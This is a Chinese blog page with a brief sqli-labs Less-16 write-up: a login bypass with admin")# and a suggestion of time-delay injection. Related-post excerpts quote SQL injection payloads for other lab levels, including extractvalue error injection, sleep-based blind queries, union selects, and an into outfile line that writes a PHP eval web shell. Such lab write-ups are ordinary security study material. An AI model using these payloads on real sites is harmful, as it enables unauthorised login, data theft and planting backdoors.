SQLI DUMB SERIES-16

最新推荐文章于 2025-05-10 16:48:30 发布

weixin_33754913

最新推荐文章于 2025-05-10 16:48:30 发布

阅读量183

点赞数

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/momoli/p/10705374.html

本文介绍了一种SQL注入攻击的实例，展示了如何通过输入特定字符串绕过登录验证，并提出了利用时间延迟注入获取数据库信息的方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

（1）无论怎么输入，都没有回显，但当输入 admin")#时，显示登录成功。若通过其他方法获取数据库的用户名，可通过这个方法登录成功。

（2）获取其他信息可用考虑时间延迟注入。方法同15。

转载于:https://www.cnblogs.com/momoli/p/10705374.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33754913

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

SQLI DUMB SERIES-1

weixin_33738578的博客

03-01

3073

less-1 （1）可以看到提示输入ID，而且less-1题目也有提到GET，因此试试以下操作： http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果： http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果：　　现在可知，“ ' ”并没有被过滤，因此...

SQLI DUMB SERIES-1-2

qq_43613144的博客

07-20

2662

安装了SQLI DUMB的题库这些都是为了了解sql注入的方式，碰到的题目就是这样的题去找flag。现在就是去探索方法第一题 1.提示输入ID，提示也有get，所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤，然后可以进行回显成功回显失败、所以说此处存在注入点 2.用order by判断列数第三栏位存在，第四栏位不存在，所以说这个表只有三列 3.爆库联合查询注...

参与评论您还未登录，请先登录后发表或查看评论

SQLI DUMB SERIES-13

weixin_33953384的博客

04-14

255

(1)检测闭合方式通过 ') 闭合。（2）尝试输入 admin')# 无回显。尝试报错注入，爆表payload： admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名爆users表的列其他均与12关相同。转载于:https://www.cnblogs.c...

根据sqli labs靶场角度讲述sql注入（从底层了解sql注入语句原理）

最新发布

2301_81434523的博客

05-10

1058

通俗来讲就是在用户交互界面，对用户输入的数据没有做过滤或过滤的规则不够严格，导致一些非法的sql语句进入到接收端对数据库进行非法操作（例如：查询，增删查改数据库信息）接下来我们会通过一些sql注入实例来了解注入的原理我们以sqli labs靶场第二关为示例,这里我们先跳过怎么判断是否存在注入点和回显点，我们直接来看爆数据库名例如：这个是第二关源码中的sql执行语句，我们将“-1 union select 1,2,database()--+”全部传给了$id,然后实际上这条sql语句会变为。

SQLI DUMB SERIES-10

imomoe的博客

09-24

489

第十关的步骤与第九关相同可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ //猜表名 ?id=1' and if ((ascii(substr((select column_name from information_schema....

sqli dumb series-1

03-16

sqli dumb series-1是一个SQL注入漏洞测试平台，用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例，用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并...

SQL DUMB Series-3 & 4 通关过程分享（sql注入学习DAY2）

deja_vuDM的博客

06-10

1336

单引号加括号，双引号加括号

sqli-labs-master靶场

07-14

sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别，每个级别代表一种特定的SQL注入漏洞类型，帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。在SQL注入攻击中...

SQLI DUMB SERIES-11

weixin_34324081的博客

04-10

311

（1）检测构造方式由此看出输入的用户名以及密码都被一对单引号所包含。方法一：（2）模拟真实环境，以用户的身份登录。（3）用burp抓包。开启抓包，输入用户名和密码，会自动跳到这个页面，右键，点击send to repeater. (4)打开burp的repeater页面，修改post参数，测试是否存在报错注入。说明存在报错型注入。（5）可用extr...

SQLI DUMB SERIES-6

weixin_34273479的博客

03-12

288

less6 输入 ?id=1" 说明双引号未被过滤，输入的id被一对双引号所包围，存在注入点，可以闭合双引号。而输入正常时情况和less5相同，因此注入同less5。转载于:https://www.cnblogs.com/momoli/p/10515723.html...

SQLi-DB Reborn

08-27

SQLi-DB Reborn.

SQLI DUMB SERIES-4

weixin_33725807的博客

03-02

212

less4 输入单引号发现回显正常，说明单引号被过滤了，输入双引号： ?id=1" 说明输入的Id被一对双引号和圆括号包围，因此闭合双引号和圆括号就行，其他方法跟less1差不多例如：union查询表名 ?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%2...

SQLI DUMB SERIES-20

weixin_34318272的博客

04-14

240

（1）登录成功后页面：（2）登录成功后，用burp开始抓包，刷新浏览器页面，将会跳出如下页面（3）根据各种提示，知道需要从cookies入手，寻找闭合方式闭合方式为单引号。注释符也可以用（4）开始注入；可用报错注入，方法同前面的一样，例如：爆库名 uname=admin1' and extractvalue(1,concat(0x7e,(select data...

SQLI DUMB SERIES-8

weixin_33749242的博客

04-09

372

(1）在id后加单引号。无回显，加双引号跟正常输入是一样的回显，既然不会回显出错信息，只能进行盲注。 (2)盲注的方法同less5 转载于:https://www.cnblogs.com/momoli/p/10678482.html...

SQLI DUMB SERIES-7

imomoe的博客

09-23

592

由于没有回显且作者希望我们使用outfile所以我们使用mysql中的 select into outfile语句将结果输出到指定的文件中 ?id=1'))--+ 构造闭合 ?id=1')) union all select 1,2,'<?php @eval($_POST["xxx"]);?>' into outfile '/var/www/sql/123.txt' --+ ...

SQLI DUMB SERIES-5

weixin_34179762的博客

03-12

653

less5 （1）输入单引号，回显错误，说明存在注入点。输入的Id被一对单引号所包围，可以闭合单引号（2）输入正常时：?id=1 说明没有显示位，因此不能使用联合查询了；可以使用报错注入,有两种方式（3）双注入查询参考资料：http://www.2cto.com/article/201303/192718.html 简单的说，使用聚合函数进行双注入查询时...

【SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码

开水的博客

02-21

358

先使用已知信息admin/admin登录进去查下题，发现可以修改密码。第三步，进入修改密码界面，随机输入一个旧密码，然后将需要重置的密码。第一步，注册一个新用户：admin’#/123456。，因此注释符#后面的内容都被注释，导致我们不需要知道。第二步，登录刚刚注册的admin’#用户。用户的密码，即可重置。